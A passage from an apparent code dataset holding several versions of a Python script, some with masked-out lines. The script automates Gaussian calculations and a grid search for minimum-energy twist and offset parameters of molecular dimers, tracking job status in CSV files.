'theta', 'cx', 'cy', 'cz']]\n machine_type_list = df_queue['machine_type'].values.tolist()\n len_queue = len(df_queue)\n maxnum_machine2 = 3\n for idx, row in zip(df_queue.index, df_queue.values):\n machine_type, file_name, A1, A2, a, b, theta, cx, cy, cz = row\n log_filepath = os.path.join(*[auto_dir, 'gaussian', file_name])\n if not os.path.exists(log_filepath):\n continue\n E_list = get_E(log_filepath)\n if len(E_list) != 5:\n continue\n else:\n len_queue -= 1\n machine_type_list.remove(machine_type)\n Ei0, Eip1, Eip2, Eit1, Eit2 = map(float, E_list)\n Eit3 = Eit2\n Eit4 = Eit1\n try:\n Ep, Et = df_step2[(df_step2['A1'] == A1) & (df_step2['A2'] ==\n A2) & (df_step2['theta'] == theta) & (df_step2['a'] ==\n a) & (df_step2['b'] == b)][['E_p', 'E_t']].values[0]\n except IndexError:\n inner_params_dict = {'A1': A1, 'A2': A2, 'a': a, 'b': b,\n 'theta': theta, 'cx': 0, 'cy': 0, 'cz': 0}\n inner_file_name = exec_gjf(auto_dir, monomer_name,\n inner_params_dict, machine_type, isInterlayer=False,\n isTest=isTest)\n time.sleep(200)\n is_inner_over = False\n while not is_inner_over:\n 
time.sleep(30)\n E_inner_list = get_E(inner_file_name)\n is_inner_over = len(E_inner_list) == 2\n Ep, Et = map(float, E_inner_list)\n df_newline = pd.Series({**inner_params_dict, 'E': 2 * Ep + \n 4 * Et, 'E_p': Ep, 'E_t': Et, 'machine_type':\n machine_type, 'status': 'Done', 'file_name':\n inner_file_name})\n df_step2 = df_step2.append(df_newline, ignore_index=True)\n df_step2.to_csv(auto_step2_csv, index=False)\n E = 4 * Et + 2 * Ep + 2 * (Ei0 + Eip1 + Eip2 + Eit1 + Eit2 +\n Eit3 + Eit4)\n df_E.loc[idx, ['E_p', 'E_t', 'E_i0', 'E_ip1', 'E_ip2', 'E_it1',\n 'E_it2', 'E_it3', 'E_it4', 'E', 'status']] = [Ep, Et, Ei0,\n Eip1, Eip2, Eit1, Eit2, Eit3, Eit4, E, 'Done']\n df_E.to_csv(auto_csv, index=False)\n break\n isAvailable = len_queue < num_nodes\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\n machine_type = 1 if machine2IsFull else 2\n if isAvailable:\n params_dict = get_params_dict(auto_dir, num_nodes, fixed_param_keys,\n opt_param_keys, monomer_name)\n if len(params_dict) != 0:\n alreadyCalculated = check_calc_status(auto_dir, params_dict)\n if not alreadyCalculated:\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict\n }, machine_type, isInterlayer=True, isTest=isTest)\n df_newline = pd.Series({**params_dict, 'E': 0.0, 'E_p': 0.0,\n 'E_t': 0.0, 'E_i0': 0.0, 'E_ip1': 0.0, 'E_ip2': 0.0,\n 'E_it1': 0.0, 'E_it2': 0.0, 'E_it3': 0.0, 'E_it4': 0.0,\n 'machine_type': machine_type, 'status': 'InProgress',\n 'file_name': file_name})\n df_E = df_E.append(df_newline, ignore_index=True)\n df_E.to_csv(auto_csv, index=False)\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_init_params_done = filter_df(df_init_params, {'status': 'Done'})\n isOver = True if len(df_init_params_done) == len(df_init_params) else False\n return isOver\n\n\ndef check_calc_status(auto_dir, params_dict):\n df_E = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n if len(df_E) == 0:\n return False\n df_E_filtered = filter_df(df_E, params_dict)\n df_E_filtered = df_E_filtered.reset_index(drop=True)\n try:\n status = get_values_from_df(df_E_filtered, 0, 'status')\n return status == 'Done'\n except KeyError:\n return False\n\n\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys,\n monomer_name):\n \"\"\"\n 前提:\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\n \"\"\"\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n df_init_params_inprogress = df_init_params[df_init_params['status'] ==\n 'InProgress']\n if len(df_init_params_inprogress) < num_nodes:\n df_init_params_notyet = df_init_params[df_init_params['status'] ==\n 'NotYet']\n for index in df_init_params_notyet.index:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n return params_dict\n for index in df_init_params.index:\n df_init_params = pd.read_csv(init_params_csv)\n init_params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n fixed_params_dict = df_init_params.loc[index, fixed_param_keys\n ].to_dict()\n isDone, opt_params_dict = get_opt_params_dict(df_cur,\n init_params_dict, fixed_params_dict, monomer_name)\n if isDone:\n df_init_params = update_value_in_df(df_init_params, index,\n 
'status', 'Done')\n if np.max(df_init_params.index) < index + 1:\n status = 'Done'\n else:\n status = get_values_from_df(df_init_params, index + 1, 'status'\n )\n df_init_params.to_csv(init_params_csv, index=False)\n if status == 'NotYet':\n opt_params_dict = get_values_from_df(df_init_params, index +\n 1, opt_param_keys)\n df_init_params = update_value_in_df(df_init_params, index +\n 1, 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n return {**fixed_params_dict, **opt_params_dict}\n else:\n continue\n else:\n df_inprogress = filter_df(df_cur, {**fixed_params_dict, **\n opt_params_dict, 'status': 'InProgress'})\n if len(df_inprogress) >= 1:\n continue\n return {**fixed_params_dict, **opt_params_dict}\n return {}\n\n\ndef get_opt_params_dict(df_cur, init_params_dict, fixed_params_dict,\n monomer_name):\n df_val = filter_df(df_cur, fixed_params_dict)\n a_init_prev = init_params_dict['a']\n b_init_prev = init_params_dict['b']\n theta_init_prev = init_params_dict['theta']\n A1 = init_params_dict['A1']\n A2 = init_params_dict['A2']\n while True:\n E_list = []\n heri_list = []\n for a in [a_init_prev - 0.1, a_init_prev, a_init_prev + 0.1]:\n for b in [b_init_prev - 0.1, b_init_prev, b_init_prev + 0.1]:\n a = np.round(a, 1)\n b = np.round(b, 1)\n for theta in [theta_init_prev - 0.5, theta_init_prev, \n theta_init_prev + 0.5]:\n df_val_ab = df_val[(df_val['a'] == a) & (df_val['b'] ==\n b) & (df_val['theta'] == theta) & (df_val['A1'] ==\n A1) & (df_val['A2'] == A2) & (df_val['status'] ==\n 'Done')]\n if len(df_val_ab) == 0:\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a,\n b, theta)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1\n ), np.round(cz, 1)\n return False, {'a': a, 'b': b, 'theta': theta, 'cx':\n cx, 'cy': cy, 'cz': cz}\n heri_list.append([a, b, theta])\n E_list.append(df_val_ab['E'].values[0])\n a_init, b_init, theta_init = heri_list[np.argmin(np.array(E_list))]\n if (a_init == a_init_prev and b_init == b_init_prev and theta_init ==\n theta_init_prev):\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a_init, b_init,\n theta_init)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1), np.round(cz, 1)\n return True, {'a': a_init, 'b': b_init, 'theta': theta_init,\n 'cx': cx, 'cy': cy, 'cz': cz}\n else:\n a_init_prev = a_init\n b_init_prev = b_init\n theta_init_prev = theta_init\n\n\ndef get_values_from_df(df, index, key):\n return df.loc[index, key]\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\ndef filter_df(df, dict_filter):\n query = []\n for k, v in dict_filter.items():\n if type(v) == str:\n query.append('{} == \"{}\"'.format(k, v))\n else:\n query.append('{} == {}'.format(k, v))\n df_filtered = df.query(' and '.join(query))\n return df_filtered\n\n\n<mask token>\n",
"step-4": "<mask token>\nsys.path.append(os.path.join(os.environ['HOME'], 'Working/interaction/'))\n<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\ndef listen(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n num_nodes = args.num_nodes\n isTest = args.isTest\n fixed_param_keys = ['A1', 'A2']\n opt_param_keys = ['a', 'b', 'theta', 'cx', 'cy', 'cz']\n auto_step2_csv = (\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.\n format(monomer_name))\n df_step2 = pd.read_csv(auto_step2_csv)\n auto_csv = os.path.join(auto_dir, 'step3-twist.csv')\n df_E = pd.read_csv(auto_csv)\n df_queue = df_E.loc[df_E['status'] == 'InProgress', ['machine_type',\n 'file_name', 'A1', 'A2', 'a', 'b', 'theta', 'cx', 'cy', 'cz']]\n machine_type_list = df_queue['machine_type'].values.tolist()\n len_queue = len(df_queue)\n maxnum_machine2 = 3\n for idx, row in zip(df_queue.index, df_queue.values):\n machine_type, file_name, A1, A2, a, b, theta, cx, cy, cz = row\n log_filepath = os.path.join(*[auto_dir, 'gaussian', file_name])\n if not os.path.exists(log_filepath):\n continue\n E_list = get_E(log_filepath)\n if len(E_list) != 5:\n continue\n else:\n len_queue -= 1\n machine_type_list.remove(machine_type)\n Ei0, Eip1, Eip2, Eit1, Eit2 = map(float, E_list)\n Eit3 = Eit2\n Eit4 = Eit1\n try:\n Ep, Et = df_step2[(df_step2['A1'] == A1) & (df_step2['A2'] ==\n A2) & (df_step2['theta'] == theta) & (df_step2['a'] ==\n a) & (df_step2['b'] == b)][['E_p', 'E_t']].values[0]\n except IndexError:\n inner_params_dict = {'A1': A1, 'A2': A2, 'a': a, 'b': b,\n 'theta': theta, 'cx': 0, 'cy': 0, 'cz': 0}\n inner_file_name = exec_gjf(auto_dir, monomer_name,\n inner_params_dict, machine_type, isInterlayer=False,\n 
isTest=isTest)\n time.sleep(200)\n is_inner_over = False\n while not is_inner_over:\n time.sleep(30)\n E_inner_list = get_E(inner_file_name)\n is_inner_over = len(E_inner_list) == 2\n Ep, Et = map(float, E_inner_list)\n df_newline = pd.Series({**inner_params_dict, 'E': 2 * Ep + \n 4 * Et, 'E_p': Ep, 'E_t': Et, 'machine_type':\n machine_type, 'status': 'Done', 'file_name':\n inner_file_name})\n df_step2 = df_step2.append(df_newline, ignore_index=True)\n df_step2.to_csv(auto_step2_csv, index=False)\n E = 4 * Et + 2 * Ep + 2 * (Ei0 + Eip1 + Eip2 + Eit1 + Eit2 +\n Eit3 + Eit4)\n df_E.loc[idx, ['E_p', 'E_t', 'E_i0', 'E_ip1', 'E_ip2', 'E_it1',\n 'E_it2', 'E_it3', 'E_it4', 'E', 'status']] = [Ep, Et, Ei0,\n Eip1, Eip2, Eit1, Eit2, Eit3, Eit4, E, 'Done']\n df_E.to_csv(auto_csv, index=False)\n break\n isAvailable = len_queue < num_nodes\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\n machine_type = 1 if machine2IsFull else 2\n if isAvailable:\n params_dict = get_params_dict(auto_dir, num_nodes, fixed_param_keys,\n opt_param_keys, monomer_name)\n if len(params_dict) != 0:\n alreadyCalculated = check_calc_status(auto_dir, params_dict)\n if not alreadyCalculated:\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict\n }, machine_type, isInterlayer=True, isTest=isTest)\n df_newline = pd.Series({**params_dict, 'E': 0.0, 'E_p': 0.0,\n 'E_t': 0.0, 'E_i0': 0.0, 'E_ip1': 0.0, 'E_ip2': 0.0,\n 'E_it1': 0.0, 'E_it2': 0.0, 'E_it3': 0.0, 'E_it4': 0.0,\n 'machine_type': machine_type, 'status': 'InProgress',\n 'file_name': file_name})\n df_E = df_E.append(df_newline, ignore_index=True)\n df_E.to_csv(auto_csv, index=False)\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_init_params_done = filter_df(df_init_params, {'status': 'Done'})\n isOver = True if len(df_init_params_done) == len(df_init_params) else False\n return isOver\n\n\ndef check_calc_status(auto_dir, params_dict):\n df_E = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n if len(df_E) == 0:\n return False\n df_E_filtered = filter_df(df_E, params_dict)\n df_E_filtered = df_E_filtered.reset_index(drop=True)\n try:\n status = get_values_from_df(df_E_filtered, 0, 'status')\n return status == 'Done'\n except KeyError:\n return False\n\n\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys,\n monomer_name):\n \"\"\"\n 前提:\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\n \"\"\"\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n df_init_params_inprogress = df_init_params[df_init_params['status'] ==\n 'InProgress']\n if len(df_init_params_inprogress) < num_nodes:\n df_init_params_notyet = df_init_params[df_init_params['status'] ==\n 'NotYet']\n for index in df_init_params_notyet.index:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n return params_dict\n for index in df_init_params.index:\n df_init_params = pd.read_csv(init_params_csv)\n init_params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n fixed_params_dict = df_init_params.loc[index, fixed_param_keys\n ].to_dict()\n isDone, opt_params_dict = get_opt_params_dict(df_cur,\n init_params_dict, fixed_params_dict, 
monomer_name)\n if isDone:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'Done')\n if np.max(df_init_params.index) < index + 1:\n status = 'Done'\n else:\n status = get_values_from_df(df_init_params, index + 1, 'status'\n )\n df_init_params.to_csv(init_params_csv, index=False)\n if status == 'NotYet':\n opt_params_dict = get_values_from_df(df_init_params, index +\n 1, opt_param_keys)\n df_init_params = update_value_in_df(df_init_params, index +\n 1, 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n return {**fixed_params_dict, **opt_params_dict}\n else:\n continue\n else:\n df_inprogress = filter_df(df_cur, {**fixed_params_dict, **\n opt_params_dict, 'status': 'InProgress'})\n if len(df_inprogress) >= 1:\n continue\n return {**fixed_params_dict, **opt_params_dict}\n return {}\n\n\ndef get_opt_params_dict(df_cur, init_params_dict, fixed_params_dict,\n monomer_name):\n df_val = filter_df(df_cur, fixed_params_dict)\n a_init_prev = init_params_dict['a']\n b_init_prev = init_params_dict['b']\n theta_init_prev = init_params_dict['theta']\n A1 = init_params_dict['A1']\n A2 = init_params_dict['A2']\n while True:\n E_list = []\n heri_list = []\n for a in [a_init_prev - 0.1, a_init_prev, a_init_prev + 0.1]:\n for b in [b_init_prev - 0.1, b_init_prev, b_init_prev + 0.1]:\n a = np.round(a, 1)\n b = np.round(b, 1)\n for theta in [theta_init_prev - 0.5, theta_init_prev, \n theta_init_prev + 0.5]:\n df_val_ab = df_val[(df_val['a'] == a) & (df_val['b'] ==\n b) & (df_val['theta'] == theta) & (df_val['A1'] ==\n A1) & (df_val['A2'] == A2) & (df_val['status'] ==\n 'Done')]\n if len(df_val_ab) == 0:\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a,\n b, theta)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1\n ), np.round(cz, 1)\n return False, {'a': a, 'b': b, 'theta': theta, 'cx':\n cx, 'cy': cy, 'cz': cz}\n heri_list.append([a, b, theta])\n E_list.append(df_val_ab['E'].values[0])\n a_init, b_init, theta_init = heri_list[np.argmin(np.array(E_list))]\n if (a_init == a_init_prev and b_init == b_init_prev and theta_init ==\n theta_init_prev):\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a_init, b_init,\n theta_init)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1), np.round(cz, 1)\n return True, {'a': a_init, 'b': b_init, 'theta': theta_init,\n 'cx': cx, 'cy': cy, 'cz': cz}\n else:\n a_init_prev = a_init\n b_init_prev = b_init\n theta_init_prev = theta_init\n\n\ndef get_values_from_df(df, index, key):\n return df.loc[index, key]\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\ndef filter_df(df, dict_filter):\n query = []\n for k, v in dict_filter.items():\n if type(v) == str:\n query.append('{} == \"{}\"'.format(k, v))\n else:\n query.append('{} == {}'.format(k, v))\n df_filtered = df.query(' and '.join(query))\n return df_filtered\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--init', action='store_true')\n parser.add_argument('--isTest', action='store_true')\n parser.add_argument('--auto-dir', type=str, help=\n 'path to dir which includes gaussian, gaussview and csv')\n parser.add_argument('--monomer-name', type=str, help='monomer name')\n parser.add_argument('--num-nodes', type=int, help='num nodes')\n args = parser.parse_args()\n if args.init:\n print('----initial process----')\n init_process(args)\n print('----main process----')\n main_process(args)\n print('----finish process----')\n",
"step-5": "import os\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nfrom tqdm import tqdm\r\nsys.path.append(os.path.join(os.environ['HOME'],'Working/interaction/'))\r\nfrom src.make import exec_gjf\r\nfrom src.vdw import vdw_R, get_c_vec_vdw\r\nfrom src.utils import get_E\r\nimport argparse\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport scipy.spatial.distance as distance\r\nimport random\r\n\r\ndef init_process(args):\r\n auto_dir = args.auto_dir\r\n monomer_name = args.monomer_name\r\n \r\n os.makedirs(os.path.join(auto_dir,'gaussian'), exist_ok=True)\r\n os.makedirs(os.path.join(auto_dir,'gaussview'), exist_ok=True)\r\n\r\n def get_init_para_csv(auto_dir,monomer_name):\r\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\r\n df = pd.read_csv('/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'.format(monomer_name))\r\n# df = df[(df[\"A2\"]==30)&(df[\"A1\"]<=0)&(df[\"A1\"]>=-10)&(df[\"theta\"]>45)]\r\n df = df[(df[\"A2\"]==32)&(df[\"A1\"]<=0)&(df[\"A1\"]>=-20)&(df[\"theta\"]>45)]\r\n \r\n inner_zip = df[['a','b','theta','A1','A2']].values\r\n print(inner_zip)\r\n init_para_list = []\r\n for a,b,theta,A1,A2 in tqdm(inner_zip):\r\n c = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)\r\n init_para_list.append([np.round(a,1),np.round(b,1),theta,A1,A2,np.round(c[0],1),np.round(c[1],1),np.round(c[2],1),'NotYet'])\r\n \r\n df_init_params = pd.DataFrame(np.array(init_para_list),columns = ['a','b','theta','A1','A2','cx','cy','cz','status'])\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n get_init_para_csv(auto_dir,monomer_name)\r\n \r\n auto_csv_path = os.path.join(auto_dir,'step3-twist.csv')\r\n if not os.path.exists(auto_csv_path): \r\n df_E = pd.DataFrame(columns = ['a','b','theta','A1','A2','cx','cy','cz','E','E_p','E_t','machine_type','status','file_name'])\r\n else:\r\n df_E = pd.read_csv(auto_csv_path)\r\n df_E = df_E[df_E['status']!='InProgress']\r\n df_E.to_csv(auto_csv_path,index=False)\r\n\r\n df_init=pd.read_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'))\r\n df_init['status']='NotYet'\r\n df_init.to_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'),index=False)\r\n\r\ndef main_process(args):\r\n os.chdir(os.path.join(args.auto_dir,'gaussian'))\r\n isOver = False\r\n while not(isOver):\r\n #check\r\n isOver = listen(args)\r\n time.sleep(1)\r\n\r\ndef listen(args):\r\n auto_dir = args.auto_dir\r\n monomer_name = args.monomer_name\r\n num_nodes = args.num_nodes\r\n isTest = args.isTest\r\n fixed_param_keys = ['A1','A2']\r\n opt_param_keys = ['a','b','theta','cx','cy','cz']\r\n\r\n auto_step2_csv = '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.format(monomer_name)\r\n df_step2 = pd.read_csv(auto_step2_csv)\r\n \r\n auto_csv = os.path.join(auto_dir,'step3-twist.csv')\r\n df_E = pd.read_csv(auto_csv)\r\n df_queue = df_E.loc[df_E['status']=='InProgress',['machine_type','file_name','A1','A2','a','b','theta','cx','cy','cz']]\r\n machine_type_list = df_queue['machine_type'].values.tolist()\r\n len_queue = len(df_queue)\r\n maxnum_machine2 = 3#int(num_nodes/2)\r\n \r\n for idx,row in zip(df_queue.index,df_queue.values):\r\n machine_type,file_name,A1,A2,a,b,theta,cx,cy,cz = row\r\n log_filepath = os.path.join(*[auto_dir,'gaussian',file_name])\r\n if not(os.path.exists(log_filepath)):#logファイルが生成される直前だとまずいので\r\n continue\r\n E_list=get_E(log_filepath)\r\n if len(E_list)!=5:\r\n continue\r\n else:\r\n len_queue-=1;machine_type_list.remove(machine_type)\r\n 
Ei0,Eip1,Eip2,Eit1,Eit2=map(float,E_list)\r\n Eit3 = Eit2; Eit4 = Eit1\r\n try:\r\n Ep, Et = df_step2[(df_step2['A1']==A1)&(df_step2['A2']==A2)&(df_step2['theta']==theta)&(df_step2['a']==a)&(df_step2['b']==b)][['E_p','E_t']].values[0]\r\n except IndexError:\r\n inner_params_dict = {\"A1\":A1,\"A2\":A2,\"a\":a,\"b\":b,\"theta\":theta,'cx':0,'cy':0,'cz':0}\r\n inner_file_name = exec_gjf(auto_dir, monomer_name, inner_params_dict, machine_type,isInterlayer=False,isTest=isTest)\r\n time.sleep(200)#1:40で1計算終わる\r\n is_inner_over = False\r\n while not(is_inner_over):\r\n time.sleep(30)#1:40で1計算終わる\r\n E_inner_list=get_E(inner_file_name)\r\n is_inner_over = len(E_inner_list)==2\r\n Ep, Et=map(float,E_inner_list)\r\n df_newline = pd.Series({**inner_params_dict,'E':2*Ep+4*Et,'E_p':Ep,'E_t':Et,'machine_type':machine_type,'status':'Done','file_name':inner_file_name})\r\n df_step2=df_step2.append(df_newline,ignore_index=True)\r\n df_step2.to_csv(auto_step2_csv,index=False)\r\n \r\n E = 4*Et + 2*Ep + 2*(Ei0 + Eip1+ Eip2 + Eit1 + Eit2 + Eit3 + Eit4)\r\n df_E.loc[idx, ['E_p','E_t','E_i0','E_ip1','E_ip2','E_it1','E_it2','E_it3','E_it4','E','status']] = [Ep,Et,Ei0,Eip1,Eip2,Eit1,Eit2,Eit3,Eit4,E,'Done']\r\n df_E.to_csv(auto_csv,index=False)\r\n break#2つ同時に計算終わったりしたらまずいので一個で切る\r\n isAvailable = len_queue < num_nodes \r\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\r\n machine_type = 1 if machine2IsFull else 2\r\n if isAvailable:\r\n params_dict = get_params_dict(auto_dir,num_nodes, fixed_param_keys, opt_param_keys, monomer_name)\r\n if len(params_dict)!=0:#終わりがまだ見えないなら\r\n alreadyCalculated = check_calc_status(auto_dir,params_dict)\r\n if not(alreadyCalculated):\r\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict}, machine_type,isInterlayer=True,isTest=isTest)\r\n df_newline = pd.Series({**params_dict,'E':0.,'E_p':0.,'E_t':0.,'E_i0':0.,'E_ip1':0.,'E_ip2':0.,'E_it1':0.,'E_it2':0.,'E_it3':0.,'E_it4':0.,'machine_type':machine_type,'status':'InProgress','file_name':file_name})\r\n df_E=df_E.append(df_newline,ignore_index=True)\r\n df_E.to_csv(auto_csv,index=False)\r\n \r\n init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_init_params_done = filter_df(df_init_params,{'status':'Done'})\r\n isOver = True if len(df_init_params_done)==len(df_init_params) else False\r\n return isOver\r\n\r\ndef check_calc_status(auto_dir,params_dict):\r\n df_E= pd.read_csv(os.path.join(auto_dir,'step3-twist.csv'))\r\n if len(df_E)==0:\r\n return False\r\n df_E_filtered = filter_df(df_E, params_dict)\r\n df_E_filtered = df_E_filtered.reset_index(drop=True)\r\n try:\r\n status = get_values_from_df(df_E_filtered,0,'status')\r\n return status=='Done'\r\n except KeyError:\r\n return False\r\n\r\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys, monomer_name):\r\n \"\"\"\r\n 前提:\r\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\r\n \"\"\"\r\n init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\r\n df_init_params_inprogress = df_init_params[df_init_params['status']=='InProgress']\r\n \r\n #最初の立ち上がり時\r\n if len(df_init_params_inprogress) < num_nodes:\r\n df_init_params_notyet = df_init_params[df_init_params['status']=='NotYet']\r\n for index in df_init_params_notyet.index:\r\n df_init_params = update_value_in_df(df_init_params,index,'status','InProgress')\r\n 
df_init_params.to_csv(init_params_csv,index=False)\r\n params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n return params_dict\r\n for index in df_init_params.index:\r\n df_init_params = pd.read_csv(init_params_csv)\r\n init_params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n fixed_params_dict = df_init_params.loc[index,fixed_param_keys].to_dict()\r\n isDone, opt_params_dict = get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name)\r\n if isDone:\r\n # df_init_paramsのstatusをupdate\r\n df_init_params = update_value_in_df(df_init_params,index,'status','Done')\r\n if np.max(df_init_params.index) < index+1:\r\n status = 'Done'\r\n else:\r\n status = get_values_from_df(df_init_params,index+1,'status')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n if status=='NotYet': \r\n opt_params_dict = get_values_from_df(df_init_params,index+1,opt_param_keys)\r\n df_init_params = update_value_in_df(df_init_params,index+1,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n return {**fixed_params_dict,**opt_params_dict}\r\n else:\r\n continue\r\n\r\n else:\r\n df_inprogress = filter_df(df_cur, {**fixed_params_dict,**opt_params_dict,'status':'InProgress'})\r\n if len(df_inprogress)>=1:\r\n continue\r\n return {**fixed_params_dict,**opt_params_dict}\r\n return {}\r\n \r\ndef get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name):\r\n df_val = filter_df(df_cur, fixed_params_dict)\r\n a_init_prev = init_params_dict['a']; b_init_prev = init_params_dict['b']; theta_init_prev = init_params_dict['theta']\r\n A1 = init_params_dict['A1']; A2 = init_params_dict['A2']\r\n \r\n while True:\r\n E_list=[];heri_list=[]\r\n for a in [a_init_prev-0.1,a_init_prev,a_init_prev+0.1]:\r\n for b in [b_init_prev-0.1,b_init_prev,b_init_prev+0.1]:\r\n a = np.round(a,1);b = np.round(b,1)\r\n for theta in [theta_init_prev-0.5,theta_init_prev,theta_init_prev+0.5]:\r\n df_val_ab = df_val[\r\n (df_val['a']==a)&(df_val['b']==b)&(df_val['theta']==theta)&\r\n (df_val['A1']==A1)&(df_val['A2']==A2)&\r\n (df_val['status']=='Done')\r\n ]\r\n if len(df_val_ab)==0:\r\n cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)\r\n cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)\r\n return False,{'a':a,'b':b,'theta':theta, \"cx\":cx, \"cy\":cy, \"cz\":cz }\r\n heri_list.append([a,b,theta]);E_list.append(df_val_ab['E'].values[0])\r\n a_init,b_init,theta_init = heri_list[np.argmin(np.array(E_list))]\r\n if a_init==a_init_prev and b_init==b_init_prev and theta_init==theta_init_prev:\r\n cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a_init,b_init,theta_init)\r\n cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)\r\n return True,{'a':a_init,'b':b_init, 'theta':theta_init, \"cx\":cx, \"cy\":cy, \"cz\":cz }\r\n else:\r\n 